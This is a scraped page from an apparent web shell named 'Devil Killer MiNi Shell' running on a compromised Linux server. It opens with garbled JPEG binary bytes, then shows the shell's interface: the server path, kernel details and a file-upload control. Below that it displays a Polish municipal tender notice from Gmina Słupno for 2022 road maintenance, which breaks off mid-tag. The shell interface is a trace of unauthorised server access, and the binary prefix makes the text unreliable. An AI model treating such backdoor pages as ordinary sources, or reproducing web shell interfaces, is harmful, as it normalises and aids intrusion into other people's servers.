JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220720/0026886901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Letnie utrzymanie dróg gminnych w roku 2022. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SŁUPNO</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wójt Gminy Słupno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015997</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Miszewska 8A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Słupno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-472</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@slupno.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugslupno.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Letnie utrzymanie dróg gminnych w roku 2022. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2dbf49af-0820-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00268869</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024504/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Letnie utrzymanie dróg gminnych w roku 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej - www.ugslupno.bip.org.pl<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu ePUAPu lub poczty elektronicznej ug@slupno.eu umożliwiającej identyfikację podmiotów<br/>przekazujących te dokumenty elektroniczne oraz ustalenie dokładnego czasu i daty ich odbioru. Wykonawca składa ofertę za<br/>pośrednictwem „Formularza do złożenia, zmiany,<br/>wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania<br/>oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu ePUAPu lub poczty elektronicznej<br/>ug@slupno.eu umożliwiającej identyfikację podmiotów przekazujących te dokumenty elektroniczne oraz ustalenie dokładnego czasu<br/>i daty ich odbioru.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać<br/>konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia,<br/>zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>2) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>4) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>5) Zamawiający przekazuje ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na<br/>Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.<br/>6)Dokumenty elektroniczne, składane są przez wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej.<br/>7) Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 roku w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy.<br/>9) Ofertę składa się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z zapisami SWZ - projektowane postanowienia umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.271.1.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> – Część 1 – Utwardzenie nawierzchni dróg gruzem betonowym.<br/>	Zakres prac obejmuje <br/>- Tyczenie geodezyjne osi drogi <br/>- Mechaniczne wykonanie koryta dla średniej głębokości 25cm <br/>- Ułożenia warstwy piasku o grubości co najmniej 30 cm po zagęszczeniu,<br/>- Transport materiału z wykopu na odległość do 5km,<br/>- Zagęszczenie oraz profilowanie koryta,<br/>- Ułożenie warstwy gruzu betonowego – grubości 15cm po zagęszczeniu,<br/>- Mechaniczne zagęszczenie ułożonej warstwy kruszywa,<br/>- Regulacja wysokościowa studni i zasuw.<br/>Wymagania sprzętowe<br/>- Koparka lub koparko ładowarka z łyżką umożliwiającą wykonanie koryta,<br/>- Samochód lub samochody samowyładowcze,<br/>- Walec stalowy lub gumowo stalowy, <br/>- Zagęszczarka typ ciężki.<br/> Wymagania materiałowe<br/>Piasek lub pospółka o różnoziarnistości co najmniej 3. Gruz betonowy frakcji 0/63 posiadające dokument potwierdzający dopuszczenie do stosowania w budownictwie <br/>Czas na realizację <br/>- do 4 miesięcy od daty zawarcia umowy.<br/>Opis robót<br/>Zakres robót obejmuje tyczenie osi drogi przez uprawnionego geodetę. Nie wymagana jest inwentaryzacja geodezyjna oraz wykonanie map inwentaryzacyjnych. <br/>Mechaniczne wykonanie koryta na średnią głębokość 25cm wraz z odwiezieniem urobku do 5km. Zamawiający zastrzega sobie prawo do dysponowania całością lub częścią urobku z wykopu i wskazania miejsca jego składowania. Część nie zadysponowaną przez Zamawiającego ma obowiązek zadysponować wykonawca bez prawa do dodatkowego wynagrodzenia. <br/>Ręczne profilowanie dna koryta oraz zagęszczenie przy pomocy zagęszczarek lub walca. Zamawiający ma prawo do wskazania miejsc, w których ma być wykonany pomiar stopnia zagęszczenia oraz wykonane dogęszczenie dna koryta. Ułożenie dolnej warstwy piasku o grubości co najmniej 30cm po zagęszczeniu. Warstwa górna o grubości co najmniej 15 cm, powinna być wykonane z gruzu betonowego frakcji 0/63 dopuszczonego do stosowania w budownictwie.<br/>Każda z warstw powinna być oddzielnie wyprofilowana oraz zagęszczona.<br/>Warstwy można układać mechanicznie, przy pomocy rozkładarki do kruszywa, koparek, ładowarek lub ręczne. Ułożona warstwa powinna być odpowiednio wyprofilowana oraz jednorodna.<br/>Zagęszczenie warstw należy wykonać przy pomocy walca lub zagęszczarki typu ciężkiego. Inwestor ma prawo do wskazania miejsc, w których ma być wykonany pomiar stopnia zagęszczenia ułożonych warstw oraz wykonane dogęszczenie.<br/>Uporządkowanie terenu budowy.<br/>Wykonawca powinien dysponować sprzętem o parametrach oraz gruzem betonowym w ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresu.<br/>Zakres robót<br/>Zamawiający przewiduje następujące ulice na terenie gminy do utwardzenia gruzem betonowym:<br/>Nowe Gulczewo – 1 680m2:<br/>•	ul. Chocimska – 300m długości i 4m szerokości,<br/>•	ul. Ułańska – 120m długości i 4m szerokości,<br/>Szeligi – 1 240m2:<br/>•	ul. Kasztanowa – 310m długości i 4m szerokości,<br/>Cekanowo – 1 320m2:<br/>•	ul. Letnia - 260m długości i 4m szerokości,<br/>•	ul. Złota - 70m długości i 4m szerokości,<br/>W sumie jest do wykonania 4 240m2 remontowanej nawierzchni drogi.<br/>Rozliczenie robót<br/>Rozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> – CZĘŚĆ 2 – Wykonanie nawierzchni dróg z kruszywa bitumiczno-kamiennego (destrukt) <br/>	Zakres prac obejmuje<br/>- Tyczenie geodezyjne osi drogi <br/>- Mechaniczne profilowanie istniejącej korony drogi<br/>- Zagęszczenie istniejącej korony drogi<br/>- Regulacja wysokościowa studni i zasuw<br/>- Ułożenie warstwy kruszywa bitumiczno-kamiennego – grubości co najmniej 9cm po zagęszczeniu<br/>- Mechaniczne zagęszczenie ułożonej warstwy kruszywa bitumiczno-kamiennego (walec, zagęszczarka).<br/>Wymagania sprzętowe<br/>- Rozściełacz lub koparka/koparko ładowarka z łyżką umożliwiającą wykonanie koryta<br/>- Samochód lub samochody samowyładowcze<br/>- Walec stalowy lub gumowo stalowy <br/>- Zagęszczarka typ ciężki<br/> Wymagania materiałowe<br/>Kruszywo bitumiczno-kamienne pochodzące z frezowania istniejących nawierzchni bitumicznych nie powinno zawierać domieszek betonu, oraz innych materiałów. Wielkość ziaren kruszywa powinna gwarantować odpowiednie zagęszczenie ułożonej warstwy, średnica nie powinna być większa niż 25mm.<br/>Wykonawca przed rozpoczęciem układania zobowiązany jest do uzyskania akceptacji kruszywa z którego wykonywany będzie zlecony zakres drogi u inspektora nadzoru.<br/>Wykonawca powinien dysponować sprzętem o parametrach, oraz kruszywem ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresu.<br/>Czas na realizację <br/>- do 4 miesięcy od daty zawarcia umowy.<br/>Opis robót<br/>Zakres robót obejmuje tyczenie osi drogi przez uprawnionego geodetę. Nie wymagana jest inwentaryzacja geodezyjna oraz wykonanie map inwentaryzacyjnych. <br/>Mechaniczne profilowanie istniejącej korony drogi przy pomocy równiarki, koparko-ładowarki lub koparki oraz zagęszczenie przy pomocy walca lub zagęszczarki typ ciężki. <br/>Wykonanie niezbędnych robót przygotowawczych – regulacja wysokościowa studni i zasuw. Ułożenie warstwy kruszywa bitumiczno-kamiennego – grubości co najmniej 9cm po zagęszczeniu i szerokości 4m. Dodatkowo należy wykonać 1,5m zjazdy do każdej posesji i każdej krzyżującej się drogi.<br/>Kruszywo bitumiczno-kamienne pochodzące z frezowania istniejących nawierzchni bitumicznych nie powinno zawierać domieszek betonu, oraz innych materiałów. Wielkość ziaren kruszywa powinna gwarantować odpowiednie zagęszczenie ułożonej warstwy, średnica nie powinna być większa niż 25mm.<br/>Każda partia materiału musi być dopuszczona do wbudowania przez inspektora nadzoru lub upoważnionego pracownika Urzędu Gminy. <br/>Kruszywo można układać mechanicznie, przy pomocy rozściełacza, koparek, ładowarek lub ręcznie. Ułożona warstwa powinna być odpowiednio wyprofilowana oraz jednorodna.<br/>Zagęszczenie warstw należy wykonać przy pomocy walca lub zagęszczarki typ ciężki. <br/>Wykonawca powinien dysponować sprzętem o parametrach, oraz kruszywem w ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresu<br/>Zakres robót<br/>Zamawiający przewiduje następujące ulice na terenie gminy do utwardzenia kruszywem bitumiczno-kamiennym:<br/>Słupno – 1120m2:<br/>•	ul. Cisowa – 280m długości i 4m szerokości,<br/>Cekanowo – 1 960m2:<br/>•	ul. Letnia - 120m długości i 4m szerokości,<br/>•	ul. Malownicza - 230m długości i 4m szerokości,<br/>•	ul. Piesza - 140m długości i 4m szerokości,<br/>Borowiczki Pieńki – 400m2:<br/>•	Ul. Poddębiec - 100m długości i 4m szerokości,<br/>Wykowo – 720m2:<br/>•	Droga wewnętrzna (działka nr 183/1) - 180m długości i 4m szerokości,<br/>Co stanowi 4 200m2, do tego doliczane jest 10% na wykonanie dojazdów z remontowanych ulic do posesjami znajdującymi się przy niej.<br/>W sumie jest do wykonania 4 620m2 nawierzchni drogi z kruszywa bitumiczno-kamiennego (destrukt)<br/>Rozliczenie robót<br/>Rozliczenie nastąpi po wykonaniu robót i odbiorze potwierdzonym przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> – CZĘŚĆ 3 – Wyrównanie dróg gruntowych oraz częściowo utwardzonych równiarką wraz z zagęszczeniem walcem. <br/>Zakres prac obejmuje<br/>- wyrównanie istniejącej nawierzchni drogi gruntowej lub częściowo utwardzonej przy pomocy równiarki,<br/>- zagęszczenie walcem.<br/>Wymagania sprzętowe<br/>- równiarka <br/>- walec<br/>Wymagania materiałowe<br/>BRAK<br/>Czas na realizację<br/>- do 3 miesięcy od daty zawarcia umowy.<br/>Opis robót<br/>Roboty obejmują wyrównanie istniejącej nawierzchni drogi gruntowej lub częściowo utwardzonej przy pomocy równiarki z nadaniem spadku poprzecznego i podłużnego oraz zagęszczenie przy pomocy walca. Należy zwrócić szczególną uwagę na studnie kanalizacji sanitarnej jak również zasuwy znajdujące się w drodze.<br/>Zakres robót<br/>Zamawiający przewiduje następujące ulice i drogi na terenie gminy do wyrównania:<br/><br/>Słupno – 2 450m2:<br/>•	ul. Wiosenna – 450m długości i 3,5 m szerokości,<br/>•	ul. Aksamitna – 250m długości i 3,5 m szerokości,<br/>Barcikowo – 2 100m2:<br/>•	Droga na działce nr 79 i 96/3 – 600m długości i 3,5 m szerokości,<br/>Rydzyno – 2 800m2:<br/>•	Droga na działce nr 251/3 – 800m długości i 3,5 m szerokości,<br/>Wykowo – 10 700m2:<br/>•	Droga na działce nr 103/2 – 950m długości i 3,5 m szerokości<br/>•	Droga „do wału” – 200m długości i 3,5 m szerokości<br/>•	Droga na działce nr 39/1 – 650m długości i 3,5 m szerokości<br/>•	Droga na działce nr 90 – 1100m długości i 4 m szerokości<br/>Co stanowi 18 050 m2 dróg i ulic przeznaczonych do utwardzenia na terenie Gminy Słupno. <br/>Rozliczenie robót<br/>Rozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 